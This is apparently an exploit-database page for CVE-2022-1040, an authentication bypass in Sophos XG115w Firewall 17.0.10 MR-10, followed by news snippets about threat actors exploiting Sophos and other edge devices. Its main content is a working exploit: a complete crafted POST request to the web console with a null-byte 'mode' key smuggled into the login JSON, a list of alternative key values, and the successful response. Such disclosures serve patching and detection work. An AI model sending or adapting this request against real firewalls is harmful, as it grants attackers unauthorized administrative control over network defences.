Headline
Sophos XG115w Firewall 17.0.10 MR-10 Authentication Bypass
Sophos XG115w Firewall version 17.0.10 MR-10 suffers from an authentication bypass vulnerability.
# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass# Date: 2022-08-09# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.sophos.com# Version: 17.0.10 MR-10# Tested on: Windows 11# CVE : CVE-2022-1040# [ VULNERABILITY DETAILS ] : #This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication.# [ SAMPLE REQUEST ] :POST /webconsole/Controller HTTP/1.1Host: 127.0.0.1:4444Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/plain, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestOrigin: https://127.0.0.1:4444Referer: https://127.0.0.1:4444/webconsole/webpages/login.jspSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 192mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066# [ KEY MODE ] : \u0000eb ,\u0000fc , \u0000 ,\u0000ef ,...# [ Successful response ] :HTTP/1.1 200 OKDate: Thu, 04 Aug 2022 17:06:39 GMTServer: xxxxX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000Expires: Thu, 01 Jan 1970 00:00:00 GMTContent-Type: text/plain;charset=utf-8Content-Length: 53Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnlyConnection: close{"redirectionURL":"/webpages/index.jsp","status":200}
Related news
The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware. "This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a
The U.S. Federal Bureau of Investigation (FBI) has sought assistance from the public in connection with an investigation involving the breach of edge devices and computer networks belonging to companies and government entities. "An Advanced Persistent Threat group allegedly created and deployed malware (CVE-2020-12271) as part of a widespread series of indiscriminate computer intrusions designed
Nearly 20% of the zero-day flaws that attackers exploited in 2022 were in network, security, and IT management products, Mandiant says.
As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple. While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage. The
A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities. Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan
Security software company Sophos has warned of cyberattacks targeting a recently addressed critical vulnerability in its firewall product. The issue, tracked as CVE-2022-3236 (CVSS score: 9.8), impacts Sophos Firewall v19.0 MR1 (19.0.1) and older and concerns a code injection vulnerability in the User Portal and Webadmin components that could result in remote code execution. The company said it
A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found. The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network. "This access could be
Executive summary Since the Russian invasion of Ukraine began, Ukrainians have been under a nearly constant barrage of cyber attacks. Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine — this time aimed at a large software development company whose software is used in various state organizations within Ukraine. We believe that this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named "GoMet." The malware was first observed on March 28, 2022. GoMet backdoor The story of this backdoor is rather curious — ther...
A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks